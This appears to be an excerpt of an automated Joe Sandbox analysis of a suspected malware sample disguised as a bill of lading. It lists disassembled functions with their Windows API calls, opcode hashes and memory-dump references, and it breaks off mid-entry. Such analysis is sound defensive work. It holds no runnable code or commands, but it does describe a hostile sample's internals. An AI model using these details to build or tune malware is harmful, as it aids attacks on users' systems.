                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                      • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                      • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                      • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                      Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                      • String ID: 0vH
                                                                                                                      • API String ID: 327565842-3662162768
                                                                                                                      • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                      • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                      • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                      • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                      Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                      • GetFocus.USER32 ref: 00448B1C
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429747543-0
                                                                                                                      • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                      • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                      • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                      • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                      Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                      • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu$HH
                                                                                                                      • API String ID: 3164766367-3924996404
                                                                                                                      • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                      • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                      • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                      • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                      Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 3850602802-3636473452
                                                                                                                      • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                      • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                      • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                      • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                      Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3985565216-0
                                                                                                                      • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                      • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                                      • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                      • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                                      Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                      • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                      • __getptd.LIBCMT ref: 00415750
                                                                                                                      • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                      • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1269668773-0
                                                                                                                      • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                      • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                      • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                      • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                      Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                        • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                      • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                      • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                      • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                      Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                      • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                      • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4166825349-0
                                                                                                                      • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                      • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                      • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                      • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                      Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                      • API String ID: 2574300362-3261711971
                                                                                                                      • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                      • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                      • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                      • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                      Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                      • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                      • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                      • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                      Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                      • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3220332590-0
                                                                                                                      • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                      • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                      • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                      • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                      Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1612042205-0
                                                                                                                      • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                      • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                      • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                      • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                      Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                      • SendInput.USER32 ref: 0044C6E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2221674350-0
                                                                                                                      • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
